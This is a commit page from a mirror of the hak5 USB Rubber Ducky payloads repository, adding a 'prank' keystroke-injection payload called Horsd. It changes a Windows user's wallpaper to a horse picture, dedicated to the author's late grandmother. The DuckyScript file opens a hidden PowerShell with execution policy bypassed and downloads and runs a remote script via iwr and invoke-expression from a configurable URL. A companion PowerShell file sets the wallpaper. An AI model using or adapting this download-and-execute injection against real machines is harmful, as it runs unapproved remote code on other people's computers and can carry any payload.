hak5
/
usbrubberducky-payloads
mirror of https://github.com/hak5/usbrubberducky-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #322 from MocconaCoffee/patch-1 

Commit Horsd payload
pull/361/merge
Darren Kitchen 2023-06-09 19:34:32 -05:00 committed by GitHub
parent 1164ad9254 fa8de5d88c
commit 92ad03f608
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
3 changed files with 56 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

3
payloads/library/prank/Horsd/README.md Normal file
View File

@ -0,0 +1,3 @@
# Horsd - In memorium to my Nan
Changes the target users background to a picture of a brown horse running, a nod to my nan's laptop background.
** This script requires very minor configuration found on LN:23 of the payload, set your own direct access link to the horsd.ps1 powershell script.

18
payloads/library/prank/Horsd/horsd.ps1 Normal file
View File

@ -0,0 +1,18 @@
$Image="%UserProfile%/horse.jpg"
$code = @'
using System.Runtime.InteropServices;
namespace Win32{
public class Wallpaper{
[DllImport("user32.dll", CharSet=CharSet.Auto)]
static extern int SystemParametersInfo (int uAction , int uParam , string lpvParam , int fuWinIni) ;
public static void SetWallpaper(string thePath){
SystemParametersInfo(20,0,thePath,3);
}
}
}
'@
add-type $code
[Win32.Wallpaper]::SetWallpaper($Image)

35
payloads/library/prank/Horsd/payload.txt Normal file
View File

@ -0,0 +1,35 @@
REM Title: Horsd
REM Author: MocconaCoffee
REM Description: A simple script that will change the users wallpaper to Brown Horse that is running.
REM Dedicated to: This script is a toast to my Nan that passed recently (she pioneered horse backgrounds on her decade-old laptop.)
REM Target OS: Windows 10
REM Required Configurations: Ensure that you have amended changes to the URL with a direct link to the script hosted by your own hosting service. DO NOT use GitHub as a medium for staging the script.
DEFINE #SCRIPTURL example.com
DELAY 3000
GUI r
DELAY 300
STRING powershell
ENTER
DELAY 300
STRING Invoke-WebRequest -Uri https://i.imgur.com/jwstWRR.jpg -OutFile horse.jpg
ENTER
DELAY 100
STRING exit
ENTER
DELAY 1000
GUI r
DELAY 300
STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr #SCRIPTURL/horsd.ps1?dl=1; invoke-expression $pl
ENTER
DELAY 1000
GUI r
DELAY 300
STRING powershell
ENTER
DELAY 300
STRING Remove-Item horse.jpg
ENTER
DELAY 300
STRING exit
ENTER